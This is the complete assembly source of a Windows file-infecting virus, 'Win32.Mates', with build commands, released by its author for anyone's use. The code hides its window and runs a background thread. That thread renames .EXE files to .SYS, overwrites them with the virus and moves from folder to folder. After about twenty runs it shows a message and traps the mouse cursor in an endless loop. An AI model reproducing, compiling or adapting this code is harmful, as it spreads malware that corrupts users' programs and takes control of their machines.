COMMENT# ____________________________________________________________________________________________ ...:: Win32.Mates - Virus ::... - Version 1.0 - - by DiA /auXnet - - (c)02 [GermanY] - ____________________________________________________________________________________________ +++++Disclaimer+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +I am NOT responsible for any damage that you do! You can need the code however you want...+ +My motherlanguage is not English, I hope you understand what I mean. + +Feel FREE to write any Comments to + + DiA_hates_machine@gmx.de + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Why the Hell "Mates": This Virus is written for all my Mates in real life! How does it work: - get da real host's name (.SYS) - create a thread (Virus) - run Host Virus-> - start after five sek - rename found .EXE file to .SYS - copy itself in .EXE file - if no more filez in current directory -> cd.. (with my method) - infect again - when no more fileZ check counter - if no payload give full control to host Payload: - new counter method (via Get/Set CaretBlinkTime) - set new caret blink time - inc it - 20 starts of da host??? - if yes set new caret blink time (-20) stop the mouse cursor and show a message - if no inc it again and back to host Special: - the counter - hide da fucking window (with TASM32) - work with threads Here comes da 1st geneartion: ;-----MatesSys.asm-----cut------------------------------------------------------------------ .386 .model flat jumps extrn MessageBoxA:PROC extrn ExitProcess:PROC .data oTitle db '���1st Generation���',0 oMsg db 'This is da 1st generation of Win32.Mates - Virus',10,13 db ' by DiA /auXnet',10,13 db 'Have Fun...',0 .code start: push 0 push offset oTitle push offset oMsg push 0 call MessageBoxA push 0 call ExitProcess end start ;---------------------cut------------------------------------------------------------------- To Compile the Mates - ViruS: tasm32 /z /ml /m3 Mates,,; tlink32 -Tpe -c Mates,Mates,, import32.lib To Compile the Mates - SYS: tasm32 /z /ml /m3 MatesSys,,; tlink32 -Tpe -c MatesSys,MatesSys,, import32.lib rename MatesSys.exe Mates.sys # ;------------------------------------------------------------------------------------------- .386 .model flat jumps ;-----needed API's-------------------------------------------------------------------------- extrn MessageBoxA :PROC extrn SetConsoleTitleA :PROC extrn SetCursorPos :PROC extrn SetCaretBlinkTime :PROC extrn SetWindowPos :PROC extrn SetCurrentDirectoryA :PROC extrn Sleep :PROC extrn FindWindowA :PROC extrn FindFirstFileA :PROC extrn FindNextFileA :PROC extrn CreateThread :PROC extrn CloseHandle :PROC extrn CopyFileA :PROC extrn CreateProcessA :PROC extrn GetCommandLineA :PROC extrn GetCaretBlinkTime :PROC extrn lstrcpyA :PROC extrn ExitProcess :PROC ;------------------------------------------------------------------------------------------- ;-----data's for the Virus------------------------------------------------------------------ .data oTitle db '[Win32.Mates Version 1.0]',0 oMsg db 'I WANNA SAY HELLO TO SOME MATES:',10,13 db ' o DeathRider - Colorado SuckZ, Bitch ;)',10,13 db ' o Herr H. - Smoke together!',10,13 db ' o Danny - Rock ''n Roll',10,13 db ' o Pascal - I need some weed...',10,13 db 'AND ALL THE OTHER FUCKERZ :)',10,13 db 'Ride On and THANX for all',10,13,10,13 db ' greetz DiA /auXnet',0 MyConsoleTitle db '.:.',0 FileMask db '*.EXE',0 WindowHandle dd 0 ThreadHandle dd 0 ThreadID dd 0 FindHandle dd 0 ProcessInfo dd 4 dup (0) StartupInfo dd 4 dup (0) Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0 TargetFile db 200d dup (0) CreateFile db 200d dup (0) VirusFile db 200d dup (0) HostFile db 200d dup (0) Directory db 200d dup (0) ;------------------------------------------------------------------------------------------- ;-----Rock 'n Roll-------------------------------------------------------------------------- .code Mates: ;------------------------------------------------------------------------------------------- ;-----hide da window------------------------------------------------------------------------ mov eax,offset MyConsoleTitle push eax call SetConsoleTitleA call Sleep5 ;it suckz without sleep mov eax,offset MyConsoleTitle xor ebx,ebx push eax push ebx call FindWindowA mov dword ptr [WindowHandle],eax call Sleep5 mov eax,01 xor ebx,ebx mov edx,20000 push ebx push eax push eax push edx push edx push ebx push dword ptr [WindowHandle] call SetWindowPos ;------------------------------------------------------------------------------------------- ;-----create a thread (virus)--------------------------------------------------------------- mov eax,offset ThreadID xor ecx,ecx mov edx,offset RunMates call MakeThread ;------------------------------------------------------------------------------------------- ;-----get hostname (.sys) and run it-------------------------------------------------------- call GetCommandLineA ;via command line mov edx,offset VirusFile push eax push edx call lstrcpyA mov esi,offset VirusFile ;fuck da " call GetPoint add esi,4d mov dword ptr [esi],00000000h push offset VirusFile+1 push offset HostFile call lstrcpyA mov esi,offset HostFile call GetPoint mov dword ptr [esi],5359532Eh ;rename to .SYS mov eax,offset ProcessInfo xor ebx,ebx mov ecx,10h mov edx,offset StartupInfo mov edi,offset HostFile push eax ;run host push edx push ebx push ebx push ecx push ebx push ebx push ebx push edi push edi call CreateProcessA Wait4Mates: jmp Wait4Mates ;wait for da virus ;------------------------------------------------------------------------------------------- ;-----here startz da virus (after 5sek)----------------------------------------------------- RunMates: mov eax,5000 push eax ;wait 5sek before run call Sleep ;------------------------------------------------------------------------------------------- ;-----cd.. with another method-------------------------------------------------------------- mov eax,offset HostFile mov edx,offset Directory push offset eax ;copy host name 2 directory push offset edx call lstrcpyA mov esi,offset Directory call GetPoint mov edi,esi ;handle it in edi mov dword ptr [edi],00000000h ;fuck da point DotDot: ;it workz! cmp byte ptr [edi],'\' jz ClearAndSet cmp byte ptr [edi],':' ;C:\ -> cd.. -> suckz jz CheckBlink dec edi jmp DotDot ClearAndSet: inc edi mov dword ptr [edi],00000000h sub edi,2 mov eax,offset Directory push eax call SetCurrentDirectoryA ;------------------------------------------------------------------------------------------- ;-----infect some filez--------------------------------------------------------------------- mov eax,offset Win32FindData mov edx,offset FileMask push eax push edx call FindFirstFileA mov dword ptr [FindHandle],eax FindNext: cmp eax,-1 ;error -> cd.. je DotDot test eax,eax ;no more filez -> cd.. jz DotDot mov eax,offset TargetFile mov edx,offset CreateFile push eax push edx call lstrcpyA mov esi,offset CreateFile call GetPoint mov dword ptr [esi],5359532Eh ;rename to .SYS mov eax,offset CreateFile mov edx,offset TargetFile mov ecx,01 call CopyIt mov eax,offset TargetFile mov edx,offset VirusFile+1 xor ecx,ecx call CopyIt mov eax,offset Win32FindData push eax ;search more filez push dword ptr [FindHandle] call FindNextFileA jmp FindNext ;------------------------------------------------------------------------------------------- ;-----the funny part ...the payload--------------------------------------------------------- CheckBlink: call GetCaretBlinkTime ;kewl counter! mov esi,eax ;handle it in esi cmp esi,1520 ja Set1499 ;bigger cmp esi,1500 jb Set1501 ;smaler than 1500 mil sek GoOn: cmp esi,1519 jne exit ;exit when not 1519 inc esi call SetBlink ;inc da counter mov eax,offset ThreadID xor ecx,ecx mov edx,offset Message call MakeThread ;show a nice message CursorSleep: ;fuck da cursor mov eax,666 mov edx,999 push eax push edx call SetCursorPos jmp CursorSleep ;foreva ;) exit: inc esi call SetBlink ;inc da counter xor eax,eax ;null push eax call ExitProcess ;give full control to host Set1501: mov esi,1501 call SetBlink jmp GoOn Set1499: mov esi,1499 ;go from start call SetBlink jmp exit ret ;thraedend ;------------------------------------------------------------------------------------------- ;-----Sleep5 procedure---------------------------------------------------------------------- Sleep5: mov eax,05 push eax call Sleep ret ;------------------------------------------------------------------------------------------- ;-----GetPoint procedure-------------------------------------------------------------------- GetPoint: cmp byte ptr [esi],'.' jz PointFound inc esi jmp GetPoint PointFound: ret ;------------------------------------------------------------------------------------------- ;-----MakeThread procedure------------------------------------------------------------------ MakeThread: push eax push ecx push ecx push edx push ecx push ecx call CreateThread mov dword ptr [ThreadHandle],eax push dword ptr [ThreadHandle] call CloseHandle ret ;------------------------------------------------------------------------------------------- ;-----Message Thread------------------------------------------------------------------------ Message: mov eax,offset oTitle mov edx,offset oMsg xor ebx,ebx push ebx push eax push edx push ebx call MessageBoxA ret ;------------------------------------------------------------------------------------------- ;-----CopyIt procedure---------------------------------------------------------------------- CopyIt: push ecx push eax push edx call CopyFileA ret ;------------------------------------------------------------------------------------------- ;-----SetBlink procedure-------------------------------------------------------------------- SetBlink: push esi call SetCaretBlinkTime ret ;------------------------------------------------------------------------------------------- end Mates